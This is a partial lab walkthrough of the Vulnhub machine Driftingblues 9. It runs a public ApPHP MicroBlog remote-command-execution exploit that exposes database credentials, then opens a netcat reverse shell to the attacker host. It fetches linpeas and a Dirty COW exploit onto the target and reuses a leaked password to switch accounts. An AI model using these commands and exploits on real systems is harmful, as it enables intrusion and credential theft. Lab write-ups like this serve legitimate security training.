Vulnhub: Driftingblues 9 walkthrough (partial)
Driftingblues 9
Identifying the target host's IP address
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue9]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.85.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:87:54:c9 1 60 PCS Systemtechnik GmbH
192.168.56.197 08:00:27:66:4f:47 1 60 PCS Systemtechnik GmbH
Using Netdiscover, bundled with Kali Linux, the target host's IP address is identified as 192.168.56.197 (the two other hosts are the VirtualBox host-only gateway and its DHCP server).
Nmap scan
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue9]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.197 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-20 08:48 EST
Nmap scan report for localhost (192.168.56.197)
Host is up (0.000094s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-generator: ApPHP MicroBlog vCURRENT_VERSION
|_http-title: ApPHP MicroBlog
|_http-server-header: Apache/2.4.10 (Debian)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 39167/udp6 status
| 100024 1 45333/tcp6 status
| 100024 1 46215/tcp status
|_ 100024 1 52182/udp status
46215/tcp open status 1 (RPC #100024)
MAC Address: 08:00:27:66:4F:47 (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.56 seconds
Apart from two RPC ports (rpcbind and status), the Nmap scan shows only port 80 open, running Apache 2.4.10 with an ApPHP MicroBlog install. Note that the http-generator string still carries the placeholder "vCURRENT_VERSION", so the exact version has to be confirmed elsewhere; the PHPSESSID cookie is also set without the HttpOnly flag.
Get Access
Visiting port 80 returns a page with an admin login entry; the form enforces length limits on the user name and password fields. robots.txt does not exist, so move on to directory enumeration.
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue9]
└─$ curl http://192.168.56.197/robots.txt
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.10 (Debian) Server at 192.168.56.197 Port 80</address>
</body></html>
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue9]
└─$ gobuster dir --url http://192.168.56.197 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.197
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2022/11/20 08:56:08 Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 317] [--> http://192.168.56.197/images/]
/docs (Status: 301) [Size: 315] [--> http://192.168.56.197/docs/]
/page (Status: 301) [Size: 315] [--> http://192.168.56.197/page/]
/admin (Status: 301) [Size: 316] [--> http://192.168.56.197/admin/]
/license (Status: 301) [Size: 318] [--> http://192.168.56.197/license/]
/js (Status: 301) [Size: 313] [--> http://192.168.56.197/js/]
/include (Status: 301) [Size: 318] [--> http://192.168.56.197/include/]
/backup (Status: 301) [Size: 317] [--> http://192.168.56.197/backup/]
/styles (Status: 301) [Size: 317] [--> http://192.168.56.197/styles/]
/wysiwyg (Status: 301) [Size: 318] [--> http://192.168.56.197/wysiwyg/]
/server-status (Status: 403) [Size: 279]
/mails (Status: 301) [Size: 316] [--> http://192.168.56.197/mails/]
Progress: 220171 / 220561 (99.82%)
===============================================================
2022/11/20 08:56:39 Finished
===============================================================
Of these, the /mails directory is listable and contains a single text file; fetch it to Kali:
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue9]
└─$ curl http://192.168.56.197/mails/password_forgotten.txt
Hello _USER_NAME_!<br> <br>
You or someone else asked for your login info on our site, _WEB_SITE_
Your Login Info:
------------------------<br/>
Username: _USER_NAME_
Password: _USER_PASSWORD_
------------------<br/>
Best regards,
_WEB_SITE_
Could these be the /admin login credentials? Try it!
No luck; it is not that simple. The file is only the "password forgotten" e-mail template of the CMS, and _USER_NAME_ / _USER_PASSWORD_ are placeholders, not real credentials.
However, a comment in the page source already gives the exact CMS version:
<!-- This script was generated by ApPHP MicroBlog v.1.0.1 (http://www.apphp.com/php-microblog/) -->
Check whether this CMS has known vulnerabilities:
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue9]
└─$ searchsploit ApPHP MicroBlog
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
ApPHP MicroBlog 1.0.1 - Multiple Vulnerabilities | php/webapps/33030.txt
ApPHP MicroBlog 1.0.1 - Remote Command Execution | php/webapps/33070.py
ApPHP MicroBlog 1.0.2 - Cross-Site Request Forgery (Add New Author) | php/webapps/40506.html
ApPHP MicroBlog 1.0.2 - Persistent Cross-Site Scripting | php/webapps/40505.txt
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
There is a remote command execution exploit for exactly this version (1.0.1); copy it to the working directory:
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue9]
└─$ searchsploit -m php/webapps/33070.py
Exploit: ApPHP MicroBlog 1.0.1 - Remote Command Execution
URL: https://www.exploit-db.com/exploits/33070
Path: /usr/share/exploitdb/exploits/php/webapps/33070.py
File Type: Python script, ASCII text executable
Copied to: /home/kali/Vulnhub/Driftingblue9/33070.py
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue9]
└─$ ls
33070.py nmap_full_scan
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue9]
└─$ mv 33070.py exploit.py
A look at the code shows it has to be run with Python 2:
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue9]
└─$ python2 exploit.py http://192.168.56.197/index.php
-= LOTFREE exploit for ApPHP MicroBlog 1.0.1 (Free Version) =-
original exploit by Jiko : http://www.exploit-db.com/exploits/33030/
[*] Testing for vulnerability...
[+] Website is vulnerable
[*] Fecthing phpinfo
PHP Version 5.6.40-0+deb8u12
System Linux debian 3.16.0-4-586 #1 Debian 3.16.51-2 (2017-12-03) i686
Loaded Configuration File /etc/php5/apache2/php.ini
Apache Version Apache/2.4.10 (Debian)
User/Group www-data(33)/33
Server Root /etc/apache2
DOCUMENT_ROOT /var/www/html
PHP Version 5.6.40-0+deb8u12
allow_url_fopen On On
allow_url_include Off Off
disable_functions pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
open_basedir no value no value
System V Message based IPC Wez Furlong
System V Semaphores Tom May
System V Shared Memory Christian Cartus
[*] Fetching include/base.inc.php
<?php
// DATABASE CONNECTION INFORMATION
define('DATABASE_HOST', 'localhost'); // Database host
define('DATABASE_NAME', 'microblog'); // Name of the database to be used
define('DATABASE_USERNAME', 'clapton'); // User name for access to database
define('DATABASE_PASSWORD', 'yaraklitepe'); // Password for access to database
define('DB_ENCRYPT_KEY', 'p52plaiqb8'); // Database encryption key
define('DB_PREFIX', 'mb101_'); // Unique prefix of all table names in the database
?>
[*] Testing remote execution
[+] Remote exec is working with system() :)
Submit your commands, type exit to quit
> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
>
Command execution as www-data is confirmed. The exploit's prompt is awkward to work in, so spawn a reverse shell to Kali (192.168.56.137), with a listener already running there:
> which nc
/bin/nc
> nc -e /bin/bash 192.168.56.137 5555
Kali receives the reverse shell, which is then upgraded to a pty with Python:
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue9]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.137] from (UNKNOWN) [192.168.56.197] 38900
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@debian:/var/www/html$
Privilege escalation
Serve linpeas.sh from Kali with Python's built-in web server (port 8000), fetch it into /tmp on the target, make it executable and run it:
www-data@debian:/home$ cd /tmp
cd /tmp
www-data@debian:/tmp$ wget http://192.168.56.137:8000/linpeas.sh
wget http://192.168.56.137:8000/linpeas.sh
converted 'http://192.168.56.137:8000/linpeas.sh' (ANSI_X3.4-1968) -> 'http://192.168.56.137:8000/linpeas.sh' (UTF-8)
--2022-11-20 09:11:18-- http://192.168.56.137:8000/linpeas.sh
Connecting to 192.168.56.137:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 827827 (808K) [text/x-sh]
Saving to: 'linpeas.sh'
linpeas.sh 100%[=====================>] 808.42K --.-KB/s in 0.004s
2022-11-20 09:11:18 (220 MB/s) - 'linpeas.sh' saved [827827/827827]
www-data@debian:/tmp$ chmod +x linpeas.sh
chmod +x linpeas.sh
www-data@debian:/tmp$ ./linpeas.sh
./linpeas.sh
linpeas-ng by carlospolop
ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own computers and/or with the computer owner's permission.
Linux Privesc Checklist: https://book.hacktricks.xyz/linux-hardening/linux-privilege-escalation-checklist
LEGEND:
RED/YELLOW: 95% a PE vector
RED: You should take a look to it
LightCyan: Users with console
Blue: Users without console & mounted devs
Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs)
LightMagenta: Your username
Starting linpeas. Caching Writable Folders...
╔═══════════════════╗
═══════════════════════════════╣ Basic information ╠═══════════════════════════════
╚═══════════════════╝
OS: Linux version 3.16.0-4-586 (debian-kernel@lists.debian.org) (gcc version 4.8.4 (Debian 4.8.4-1) ) #1 Debian 3.16.51-2 (2017-12-03)
User & Groups: uid=33(www-data) gid=33(www-data) groups=33(www-data)
Hostname: debian
Writable folder: /dev/shm
[+] /bin/ping is available for network discovery (linpeas can discover hosts, learn more with -h)
[+] /bin/bash is available for network discovery, port scanning and port forwarding (linpeas can discover hosts, scan ports, and forward ports. Learn more with -h)
[+] /bin/nc is available for network discovery & port scanning (linpeas can discover hosts and scan ports, learn more with -h)
Caching directories . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . DONE
╔════════════════════╗
══════════════════════════════╣ System Information ╠══════════════════════════════
╚════════════════════╝
╔══════════╣ Operative system
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits
Linux version 3.16.0-4-586 (debian-kernel@lists.debian.org) (gcc version 4.8.4 (Debian 4.8.4-1) ) #1 Debian 3.16.51-2 (2017-12-03)
Distributor ID: Debian
Description: Debian GNU/Linux 8.11 (jessie)
Release: 8.11
Codename: jessie
╔══════════╣ Sudo version
sudo Not Found
╔══════════╣ CVEs Check
╔══════════╣ PATH
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-path-abuses
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
New path exported: /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
╔══════════╣ Date & uptime
Sun Nov 20 09:11:29 EST 2022
09:11:29 up 27 min, 0 users, load average: 0.00, 0.93, 1.04
╔══════════╣ Any sd*/disk* disk in /dev? (limit 20)
disk
sda
sda1
sda2
sda5
╔══════════╣ Unmounted file-system?
╚ Check if you can mount umounted devices
UUID=ff9aca6e-808b-49a0-86f4-99c90e7b249f / ext4 errors=remount-ro 0 1
UUID=262cdee1-830f-46a8-b97b-459094fc0390 none swap sw 0 0
/dev/sr0 /media/cdrom0 udf,iso9660 user,noauto 0 0
╔══════════╣ Environment
╚ Any private information inside environment variables?
HISTFILESIZE=0
SHLVL=2
OLDPWD=/home
APACHE_RUN_DIR=/var/run/apache2
APACHE_PID_FILE=/var/run/apache2/apache2.pid
_=./linpeas.sh
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
APACHE_LOCK_DIR=/var/lock/apache2
LANG=C
HISTSIZE=0
APACHE_RUN_USER=www-data
APACHE_RUN_GROUP=www-data
APACHE_LOG_DIR=/var/log/apache2
PWD=/tmp
HISTFILE=/dev/null
╔══════════╣ Searching Signature verification failed in dmesg
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#dmesg-signature-verification-failed
dmesg Not Found
╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
[+] [CVE-2016-5195] dirtycow
Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Exposure: highly probable
Tags: [ debian=7|8 ],RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},ubuntu=16.04|14.04|12.04
Download URL: https://www.exploit-db.com/download/40611
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
[+] [CVE-2016-5195] dirtycow 2
Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Exposure: highly probable
Tags: [ debian=7|8 ],RHEL=5|6|7,ubuntu=14.04|12.04,ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic}
Download URL: https://www.exploit-db.com/download/40839
ext-url: https://www.exploit-db.com/download/40847
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
From the linpeas output, the dirtycow 2 exploit (40839.c, flagged "highly probable" by Linux Exploit Suggester) looks like the obvious candidate. One caveat before investing time: LES matches on distribution and kernel-family tags (debian=8), not on the exact build. The target runs 3.16.51-2 built 2017-12-03, which postdates Debian jessie's Dirty COW fix, so the kernel is most likely already patched and the suggestion a false positive.
Download the C exploit code to Kali anyway:
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue9]
└─$ ls
40839.c exploit.py linpeas.sh nmap_full_scan
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue9]
└─$
Then serve it with Python's web server and fetch it on the target:
www-data@debian:/tmp$ wget http://192.168.56.137:8000/40839.c
wget http://192.168.56.137:8000/40839.c
converted 'http://192.168.56.137:8000/40839.c' (ANSI_X3.4-1968) -> 'http://192.168.56.137:8000/40839.c' (UTF-8)
--2022-11-20 09:19:29-- http://192.168.56.137:8000/40839.c
Connecting to 192.168.56.137:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5006 (4.9K) [text/x-csrc]
Saving to: '40839.c'
40839.c 100%[=====================>] 4.89K --.-KB/s in 0s
2022-11-20 09:19:29 (208 MB/s) - '40839.c' saved [5006/5006]
www-data@debian:/tmp$ ls
ls
40839.c linpeas.sh
www-data@debian:/tmp$
Compile it as instructed in the exploit's header comment, but the target has no gcc:
www-data@debian:/tmp$ gcc -pthread 40839.c -o dirty -lcrypt
gcc -pthread 40839.c -o dirty -lcrypt
bash: gcc: command not found
www-data@debian:/tmp$ which gcc
which gcc
www-data@debian:/tmp$
Try compiling on Kali instead and uploading the resulting binary to the target:
wget http://192.168.56.137:8000/dirty
converted 'http://192.168.56.137:8000/dirty' (ANSI_X3.4-1968) -> 'http://192.168.56.137:8000/dirty' (UTF-8)
--2022-11-20 09:22:26-- http://192.168.56.137:8000/dirty
Connecting to 192.168.56.137:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 17512 (17K) [application/octet-stream]
Saving to: 'dirty'
dirty 100%[=====================>] 17.10K --.-KB/s in 0s
2022-11-20 09:22:26 (594 MB/s) - 'dirty' saved [17512/17512]
www-data@debian:/tmp$ chmod +x dirty
chmod +x dirty
www-data@debian:/tmp$ ./dirty
./dirty
bash: ./dirty: cannot execute binary file: Exec format error
www-data@debian:/tmp$
Execution fails with "Exec format error": Kali is x86_64, while the target is a 32-bit i686 system (phpinfo reported "Linux debian 3.16.0-4-586 ... i686"), so a binary built with the default 64-bit gcc cannot run there. It would have to be cross-built as 32-bit (gcc -m32 with the multilib packages installed). This path is abandoned here.
Looking more carefully through other files turns up the database configuration seen earlier:
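A quick header check would have predicted the "Exec format error" before the upload. The following is an added example, not part of the original write-up: it parses the ELF identification bytes and the e_machine field of a binary and compares them with the target's architecture as reported by uname -m or phpinfo (here i686). The two headers embedded below are constructed sample bytes standing in for a default Kali gcc build and for a gcc -m32 build; they are not the real "dirty" binary.

```python
"""Check whether an ELF binary can execute on a given target architecture.

Added example for the write-up above (not the author's code). Reads the
ELF header and compares class (32/64-bit) and machine with the target.
"""
import struct

ELF_MAGIC = b"\x7fELF"
ELFCLASS32, ELFCLASS64 = 1, 2
EM_386, EM_X86_64 = 3, 62
MACHINE_NAMES = {EM_386: "i386", EM_X86_64: "x86-64"}


def parse_elf_header(data: bytes) -> dict:
    """Return class, endianness, e_type and machine of an ELF image.

    Only the first 20 bytes are needed: e_ident (16 bytes) is followed by
    e_type and e_machine, at the same offsets for 32- and 64-bit files.
    """
    if len(data) < 20 or data[:4] != ELF_MAGIC:
        raise ValueError("not an ELF file")
    ei_class, ei_data = data[4], data[5]          # EI_CLASS, EI_DATA
    if ei_class not in (ELFCLASS32, ELFCLASS64) or ei_data not in (1, 2):
        raise ValueError("bad ELF identification")
    endian = "<" if ei_data == 1 else ">"          # 1 = little, 2 = big
    e_type, e_machine = struct.unpack_from(endian + "HH", data, 16)
    return {
        "bits": 32 if ei_class == ELFCLASS32 else 64,
        "little_endian": ei_data == 1,
        "type": e_type,                             # 2 = ET_EXEC, 3 = ET_DYN
        "machine": MACHINE_NAMES.get(e_machine, "unknown(%d)" % e_machine),
    }


def runs_on(data: bytes, target_machine: str) -> bool:
    """True if the kernel of a host reporting `target_machine` (uname -m)
    would accept this ELF image. Shared-library availability is ignored."""
    hdr = parse_elf_header(data)
    if target_machine in ("i386", "i486", "i586", "i686"):
        # a 32-bit x86 kernel runs 32-bit x86 ELF only
        return hdr["bits"] == 32 and hdr["machine"] == "i386"
    if target_machine in ("x86_64", "amd64"):
        # a 64-bit x86 kernel normally also runs 32-bit x86 ELF (IA32 emulation)
        return hdr["machine"] in ("i386", "x86-64")
    return False


def check_file(path: str, target_machine: str) -> bool:
    """Convenience wrapper for a file on disk, e.g. check_file('dirty', 'i686')."""
    with open(path, "rb") as f:
        return runs_on(f.read(64), target_machine)


def _sample_header(ei_class: int, e_machine: int) -> bytes:
    """Constructed minimal ELF header: little-endian, version 1, ET_EXEC."""
    e_ident = ELF_MAGIC + bytes([ei_class, 1, 1, 0]) + b"\x00" * 8
    return e_ident + struct.pack("<HH", 2, e_machine)


# Constructed stand-ins: what a default Kali gcc produces vs. a gcc -m32 build.
KALI_DEFAULT_BUILD = _sample_header(ELFCLASS64, EM_X86_64)
TARGET_COMPATIBLE = _sample_header(ELFCLASS32, EM_386)

if __name__ == "__main__":
    for name, hdr in (("default build", KALI_DEFAULT_BUILD),
                      ("-m32 build", TARGET_COMPATIBLE)):
        info = parse_elf_header(hdr)
        print("%-14s %2d-bit %-7s runs on i686: %s"
              % (name, info["bits"], info["machine"], runs_on(hdr, "i686")))
```

Running check_file("dirty", "i686") against the uploaded binary returns False for the 64-bit build, which is exactly the mismatch behind "cannot execute binary file: Exec format error". The same check applies later to the SUID "input" binary copied back to Kali: knowing it is 32-bit decides which toolchain and debugger settings to use.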
www-data@debian:/var/www/html/include$ cat base.inc.php
cat base.inc.php
<?php
// DATABASE CONNECTION INFORMATION
define('DATABASE_HOST', 'localhost'); // Database host
define('DATABASE_NAME', 'microblog'); // Name of the database to be used
define('DATABASE_USERNAME', 'clapton'); // User name for access to database
define('DATABASE_PASSWORD', 'yaraklitepe'); // Password for access to database
define('DB_ENCRYPT_KEY', 'p52plaiqb8'); // Database encryption key
define('DB_PREFIX', 'mb101_'); // Unique prefix of all table names in the database
?>www-data@debian:/var/www/html/include$
The database user is clapton, who also exists as a local account. Test whether the database password was reused for that account by switching to it:
www-data@debian:/var/www/html/include$ su - clapton
su - clapton
Password: yaraklitepe
clapton@debian:~$ ls -alh
ls -alh
total 24K
dr-x------ 2 clapton clapton 4.0K May 9 2021 .
drwxr-xr-x 3 root root 4.0K May 9 2021 ..
-rwsr-xr-x 1 root root 5.1K Sep 22 2015 input
-rwxr-xr-x 1 root root 201 May 9 2021 note.txt
-rw-r--r-- 1 clapton clapton 32 May 9 2021 user.txt
clapton@debian:~$ cat user.txt
cat user.txt
F569AA95FAFF65E7A290AB9ED031E04F
clapton@debian:~$ cat note.txt
cat note.txt
buffer overflow is the way. ( ° ʖ °)
if you're new on 32bit bof then check these:
https://www.tenouk.com/Bufferoverflowc/Bufferoverflow6.html
https://samsclass.info/127/proj/lbuf1.htm
clapton@debian:~$
The note hints at a buffer overflow, and the only candidate is the root-owned SUID binary input in clapton's home directory. Copy it to Kali for analysis, serving it from the target with Python's web server (only Python 2 is installed there, hence SimpleHTTPServer):
clapton@debian:~$ ls
ls
input note.txt user.txt
clapton@debian:~$ which python
which python
/usr/bin/python
clapton@debian:~$ which python3
which python3
clapton@debian:~$ python -m SimpleHttpServer
python -m SimpleHttpServer
/usr/bin/python: No module named SimpleHttpServer
clapton@debian:~$ python -m SimpleHTTPServer
python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue9]
└─$ wget http://192.168.56.197:8000/input
--2022-11-20 09:37:26-- http://192.168.56.197:8000/input
Connecting to 192.168.56.197:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5150 (5.0K) [application/octet-stream]
Saving to: ‘input’
input 100%[==================================================================================================================================>] 5.03K --.-KB/s in 0s
2022-11-20 09:37:26 (366 MB/s) - ‘input’ saved [5150/5150]
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue9]
└─$ ls
40839.c dirty exploit.py input linpeas.sh nmap_full_scan
The buffer overflow is too difficult for me at the moment, so I am putting it aside for now!
STRIVE FOR PROGRESS, NOT FOR PERFECTION